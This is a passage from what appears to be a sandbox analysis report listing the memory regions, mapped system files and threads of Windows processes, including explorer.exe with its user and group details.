"\\Windows\\System32\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\urlmon.dll.mui") Region: id = 1251 start_va = 0x6bab0000 end_va = 0x6c066fff entry_point = 0x6bab0000 region_type = mapped_file name = "mshtml.dll" filename = "\\Windows\\System32\\mshtml.dll" (normalized: "c:\\windows\\system32\\mshtml.dll") Region: id = 1252 start_va = 0x6ef70000 end_va = 0x6ef99fff entry_point = 0x6ef70000 region_type = mapped_file name = "msls31.dll" filename = "\\Windows\\System32\\msls31.dll" (normalized: "c:\\windows\\system32\\msls31.dll") Region: id = 1253 start_va = 0x2800000 end_va = 0x2800fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002800000" filename = "" Region: id = 1254 start_va = 0x2810000 end_va = 0x2810fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002810000" filename = "" Region: id = 1255 start_va = 0x2820000 end_va = 0x2821fff entry_point = 0x0 region_type = private name = "private_0x0000000002820000" filename = "" Region: id = 1256 start_va = 0x2830000 end_va = 0x2831fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002830000" filename = "" Region: id = 1257 start_va = 0x2840000 end_va = 0x2840fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002840000" filename = "" Region: id = 1258 start_va = 0x2a20000 end_va = 0x2a20fff entry_point = 0x2a20000 region_type = mapped_file name = "msctf.dll.mui" filename = "\\Windows\\System32\\en-US\\msctf.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\msctf.dll.mui") Region: id = 1259 start_va = 0x3b70000 end_va = 0x3c6ffff entry_point = 0x0 region_type = private name = "private_0x0000000003b70000" filename = "" Region: id = 1260 start_va = 0x6e720000 end_va = 0x6e72afff entry_point = 0x6e720000 region_type = mapped_file name = "msimtf.dll" filename = "\\Windows\\System32\\msimtf.dll" (normalized: "c:\\windows\\system32\\msimtf.dll") Region: id = 1261 start_va = 0x7ffae000 end_va = 0x7ffaefff entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 1262 start_va = 0x2a30000 end_va = 0x2a33fff entry_point = 0x2a30000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1263 start_va = 0x2a40000 end_va = 0x2a43fff entry_point = 0x2a40000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1264 start_va = 0x33d0000 end_va = 0x33fffff entry_point = 0x33d0000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000009.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db") Region: id = 1265 start_va = 0x3400000 end_va = 0x3465fff entry_point = 0x3400000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 1266 start_va = 0x3df0000 end_va = 0x3eeffff entry_point = 0x0 region_type = private name = "private_0x0000000003df0000" filename = "" Region: id = 1267 start_va = 0x6f040000 end_va = 0x6f27ffff entry_point = 0x6f040000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 1268 start_va = 0x7ffad000 end_va = 0x7ffadfff entry_point = 0x0 region_type = private name = "private_0x000000007ffad000" filename = "" Thread: id = 33 os_tid = 0xbd8 Thread: id = 34 os_tid = 0xbe0 Thread: id = 35 os_tid = 0xbe4 Thread: id = 36 os_tid = 0xbe8 Thread: id = 37 os_tid = 0xbec Thread: id = 38 os_tid = 0xbf0 Thread: id = 39 os_tid = 0xbf4 Thread: id = 40 os_tid = 0xbf8 Thread: id = 41 os_tid = 0xbfc Thread: id = 43 os_tid = 0xc04 Thread: id = 44 os_tid = 0xc08 Thread: id = 45 os_tid = 0xc0c Thread: id = 46 os_tid = 0xc10 Thread: id = 79 os_tid = 0xc14 Thread: id = 81 os_tid = 0xc1c Process: id = "5" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x7ea16320" os_pid = "0x5ac" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0xbd4" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 838 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 839 start_va = 0x20000 end_va = 0x21fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 840 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 841 start_va = 0x40000 end_va = 0x41fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 842 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 843 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 844 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 845 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 846 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 847 start_va = 0x100000 end_va = 0x11ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 848 start_va = 0x120000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 849 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 850 start_va = 0x170000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 851 start_va = 0x1b0000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 852 start_va = 0x280000 end_va = 0x281fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 853 start_va = 0x290000 end_va = 0x290fff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 854 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 855 start_va = 0x2b0000 end_va = 0x2d6fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 856 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 857 start_va = 0x3e0000 end_va = 0x4e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 858 start_va = 0x4f0000 end_va = 0x529fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 859 start_va = 0x530000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 860 start_va = 0x540000 end_va = 0x599fff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 861 start_va = 0x5a0000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 862 start_va = 0x5b0000 end_va = 0x9a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 863 start_va = 0x9b0000 end_va = 0x9b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 864 start_va = 0x9c0000 end_va = 0x9c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009c0000" filename = "" Region: id = 865 start_va = 0x9d0000 end_va = 0x9d3fff entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 866 start_va = 0x9e0000 end_va = 0x9f7fff entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 867 start_va = 0xa00000 end_va = 0xc80fff entry_point = 0xa00000 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 868 start_va = 0xc90000 end_va = 0x188ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c90000" filename = "" Region: id = 869 start_va = 0x1890000 end_va = 0x198ffff entry_point = 0x0 region_type = private name = "private_0x0000000001890000" filename = "" Region: id = 870 start_va = 0x1990000 end_va = 0x1a1ffff entry_point = 0x0 region_type = private name = "private_0x0000000001990000" filename = "" Region: id = 871 start_va = 0x1a20000 end_va = 0x1a2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a20000" filename = "" Region: id = 872 start_va = 0x1a30000 end_va = 0x1a30fff entry_point = 0x0 region_type = private name = "private_0x0000000001a30000" filename = "" Region: id = 873 start_va = 0x1a40000 end_va = 0x1a4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a40000" filename = "" Region: id = 874 start_va = 0x1a50000 end_va = 0x1a5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a50000" filename = "" Region: id = 875 start_va = 0x1a60000 end_va = 0x1a9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a60000" filename = "" Region: id = 876 start_va = 0x1aa0000 end_va = 0x1b7efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001aa0000" filename = "" Region: id = 877 start_va = 0x1b80000 end_va = 0x1e4efff entry_point = 0x1b80000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 878 start_va = 0x1e50000 end_va = 0x1e51fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e50000" filename = "" Region: id = 879 start_va = 0x1e60000 end_va = 0x1e61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e60000" filename = "" Region: id = 880 start_va = 0x1e70000 end_va = 0x1e70fff entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 881 start_va = 0x1e80000 end_va = 0x1ebffff entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 882 start_va = 0x1ec0000 end_va = 0x1efffff entry_point = 0x0 region_type = private name = "private_0x0000000001ec0000" filename = "" Region: id = 883 start_va = 0x1f00000 end_va = 0x1f3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 884 start_va = 0x1f40000 end_va = 0x1f42fff entry_point = 0x1f40000 region_type = mapped_file name = "comctl32.dll.mui" filename = "\\Windows\\winsxs\\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_581cd2bf5825dde9\\comctl32.dll.mui" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_581cd2bf5825dde9\\comctl32.dll.mui") Region: id = 885 start_va = 0x1f50000 end_va = 0x1f5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f50000" filename = "" Region: id = 886 start_va = 0x1f60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 887 start_va = 0x1f70000 end_va = 0x1f7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f70000" filename = "" Region: id = 888 start_va = 0x1f80000 end_va = 0x1f8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f80000" filename = "" Region: id = 889 start_va = 0x1f90000 end_va = 0x1f9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 890 start_va = 0x1fa0000 end_va = 0x1faffff entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 891 start_va = 0x1fb0000 end_va = 0x1fbffff entry_point = 0x0 region_type = private name = "private_0x0000000001fb0000" filename = "" Region: id = 892 start_va = 0x1fc0000 end_va = 0x1fcffff entry_point = 0x0 region_type = private name = "private_0x0000000001fc0000" filename = "" Region: id = 893 start_va = 0x1fd0000 end_va = 0x1fdffff entry_point = 0x0 region_type = private name = "private_0x0000000001fd0000" filename = "" Region: id = 894 start_va = 0x1fe0000 end_va = 0x1feffff entry_point = 0x0 region_type = private name = "private_0x0000000001fe0000" filename = "" Region: id = 895 start_va = 0x1ff0000 end_va = 0x1ff1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ff0000" filename = "" Region: id = 896 start_va = 0x2000000 end_va = 0x207ffff entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 897 start_va = 0x2080000 end_va = 0x208ffff entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 898 start_va = 0x2090000 end_va = 0x2090fff entry_point = 0x0 region_type = private name = "private_0x0000000002090000" filename = "" Region: id = 899 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 900 start_va = 0x20b0000 end_va = 0x20b0fff entry_point = 0x0 region_type = private name = "private_0x00000000020b0000" filename = "" Region: id = 901 start_va = 0x20c0000 end_va = 0x20c3fff entry_point = 0x0 region_type = private name = "private_0x00000000020c0000" filename = "" Region: id = 902 start_va = 0x20d0000 end_va = 0x20d7fff entry_point = 0x0 region_type = private name = "private_0x00000000020d0000" filename = "" Region: id = 903 start_va = 0x20e0000 end_va = 0x20e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020e0000" filename = "" Region: id = 904 start_va = 0x20f0000 end_va = 0x20f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020f0000" filename = "" Region: id = 905 start_va = 0x2100000 end_va = 0x2108fff entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 906 start_va = 0x2110000 end_va = 0x2110fff entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 907 start_va = 0x2120000 end_va = 0x212ffff entry_point = 0x0 region_type = private name = "private_0x0000000002120000" filename = "" Region: id = 908 start_va = 0x2130000 end_va = 0x222ffff entry_point = 0x2130000 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 909 start_va = 0x2230000 end_va = 0x225bfff entry_point = 0x2230000 region_type = mapped_file name = "index.dat" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 910 start_va = 0x2260000 end_va = 0x2267fff entry_point = 0x2260000 region_type = mapped_file name = "index.dat" filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 911 start_va = 0x2270000 end_va = 0x227ffff entry_point = 0x2270000 region_type = mapped_file name = "index.dat" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 912 start_va = 0x2280000 end_va = 0x2287fff entry_point = 0x2280000 region_type = mapped_file name = "urlmon.dll.mui" filename = "\\Windows\\System32\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\urlmon.dll.mui") Region: id = 913 start_va = 0x2290000 end_va = 0x2290fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002290000" filename = "" Region: id = 914 start_va = 0x22a0000 end_va = 0x22dffff entry_point = 0x22a0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat") Region: id = 915 start_va = 0x22e0000 end_va = 0x22effff entry_point = 0x22e0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012018081420180815\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\mshist012018081420180815\\index.dat") Region: id = 916 start_va = 0x22f0000 end_va = 0x22f2fff entry_point = 0x0 region_type = private name = "private_0x00000000022f0000" filename = "" Region: id = 917 start_va = 0x2300000 end_va = 0x2300fff entry_point = 0x2300000 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 918 start_va = 0x2310000 end_va = 0x2310fff entry_point = 0x2310000 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 919 start_va = 0x2320000 end_va = 0x2320fff entry_point = 0x2320000 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 920 start_va = 0x2330000 end_va = 0x2355fff entry_point = 0x0 region_type = private name = "private_0x0000000002330000" filename = "" Region: id = 921 start_va = 0x2360000 end_va = 0x237efff entry_point = 0x2360000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001a.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000001a.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001a.db") Region: id = 922 start_va = 0x2380000 end_va = 0x2380fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002380000" filename = "" Region: id = 923 start_va = 0x2390000 end_va = 0x2393fff entry_point = 0x2390000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 924 start_va = 0x23a0000 end_va = 0x23cffff entry_point = 0x23a0000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000009.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db") Region: id = 925 start_va = 0x23d0000 end_va = 0x23d3fff entry_point = 0x23d0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 926 start_va = 0x23e0000 end_va = 0x23e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000023e0000" filename = "" Region: id = 927 start_va = 0x23f0000 end_va = 0x23f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000023f0000" filename = "" Region: id = 928 start_va = 0x2400000 end_va = 0x2400fff entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 929 start_va = 0x2410000 end_va = 0x2413fff entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 930 start_va = 0x2420000 end_va = 0x245ffff entry_point = 0x0 region_type = private name = "private_0x0000000002420000" filename = "" Region: id = 931 start_va = 0x2460000 end_va = 0x249ffff entry_point = 0x0 region_type = private name = "private_0x0000000002460000" filename = "" Region: id = 932 start_va = 0x24a0000 end_va = 0x24a3fff entry_point = 0x0 region_type = private name = "private_0x00000000024a0000" filename = "" Region: id = 933 start_va = 0x24b0000 end_va = 0x24b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024b0000" filename = "" Region: id = 934 start_va = 0x24c0000 end_va = 0x24fffff entry_point = 0x0 region_type = private name = "private_0x00000000024c0000" filename = "" Region: id = 935 start_va = 0x2500000 end_va = 0x2500fff entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 936 start_va = 0x2510000 end_va = 0x2510fff entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 937 start_va = 0x2520000 end_va = 0x2520fff entry_point = 0x0 region_type = private name = "private_0x0000000002520000" filename = "" Region: id = 938 start_va = 0x2530000 end_va = 0x2530fff entry_point = 0x0 region_type = private name = "private_0x0000000002530000" filename = "" Region: id = 939 start_va = 0x2540000 end_va = 0x257ffff entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 940 start_va = 0x2580000 end_va = 0x2eaffff entry_point = 0x2580000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 941 start_va = 0x2eb0000 end_va = 0x2eb0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002eb0000" filename = "" Region: id = 942 start_va = 0x2ec0000 end_va = 0x2ec1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002ec0000" filename = "" Region: id = 943 start_va = 0x2ed0000 end_va = 0x2ed3fff entry_point = 0x2ed0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 944 start_va = 0x2ee0000 end_va = 0x2ee1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002ee0000" filename = "" Region: id = 945 start_va = 0x2ef0000 end_va = 0x2ef0fff entry_point = 0x2ef0000 region_type = mapped_file name = "{0b09c990-dfff-4f54-a0f7-84dceb6a5b2b}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{0B09C990-DFFF-4F54-A0F7-84DCEB6A5B2B}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{0b09c990-dfff-4f54-a0f7-84dceb6a5b2b}.2.ver0x0000000000000001.db") Region: id = 946 start_va = 0x2f00000 end_va = 0x2f03fff entry_point = 0x2f00000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 947 start_va = 0x2f10000 end_va = 0x2f10fff entry_point = 0x0 region_type = private name = "private_0x0000000002f10000" filename = "" Region: id = 948 start_va = 0x2f20000 end_va = 0x2f85fff entry_point = 0x2f20000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 949 start_va = 0x2f90000 end_va = 0x308ffff entry_point = 0x0 region_type = private name = "private_0x0000000002f90000" filename = "" Region: id = 950 start_va = 0x3090000 end_va = 0x3091fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003090000" filename = "" Region: id = 951 start_va = 0x30a0000 end_va = 0x30a3fff entry_point = 0x30a0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 952 start_va = 0x30b0000 end_va = 0x30b0fff entry_point = 0x0 region_type = private name = "private_0x00000000030b0000" filename = "" Region: id = 953 start_va = 0x30c0000 end_va = 0x30c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030c0000" filename = "" Region: id = 954 start_va = 0x30d0000 end_va = 0x30d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030d0000" filename = "" Region: id = 955 start_va = 0x30e0000 end_va = 0x30e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030e0000" filename = "" Region: id = 956 start_va = 0x30f0000 end_va = 0x30f0fff entry_point = 0x0 region_type = private name = "private_0x00000000030f0000" filename = "" Region: id = 957 start_va = 0x3100000 end_va = 0x3100fff entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 958 start_va = 0x3110000 end_va = 0x314ffff entry_point = 0x0 region_type = private name = "private_0x0000000003110000" filename = "" Region: id = 959 start_va = 0x3150000 end_va = 0x3150fff entry_point = 0x0 region_type = private name = "private_0x0000000003150000" filename = "" Region: id = 960 start_va = 0x3160000 end_va = 0x3160fff entry_point = 0x3160000 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 961 start_va = 0x3170000 end_va = 0x3170fff entry_point = 0x3170000 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 962 start_va = 0x3180000 end_va = 0x3180fff entry_point = 0x3180000 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 963 start_va = 0x3190000 end_va = 0x3190fff entry_point = 0x3190000 region_type = mapped_file name = "{e09a7d78-232a-4473-ac51-d6dfbb0b032a}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{E09A7D78-232A-4473-AC51-D6DFBB0B032A}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{e09a7d78-232a-4473-ac51-d6dfbb0b032a}.2.ver0x0000000000000002.db") Region: id = 964 start_va = 0x31a0000 end_va = 0x31aafff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000031a0000" filename = "" Region: id = 965 start_va = 0x31b0000 end_va = 0x31b9fff entry_point = 0x31b0000 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 966 start_va = 0x31c0000 end_va = 0x31c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000031c0000" filename = "" Region: id = 967 start_va = 0x31d0000 end_va = 0x31d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000031d0000" filename = "" Region: id = 968 start_va = 0x31e0000 end_va = 0x31e3fff entry_point = 0x31e0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: 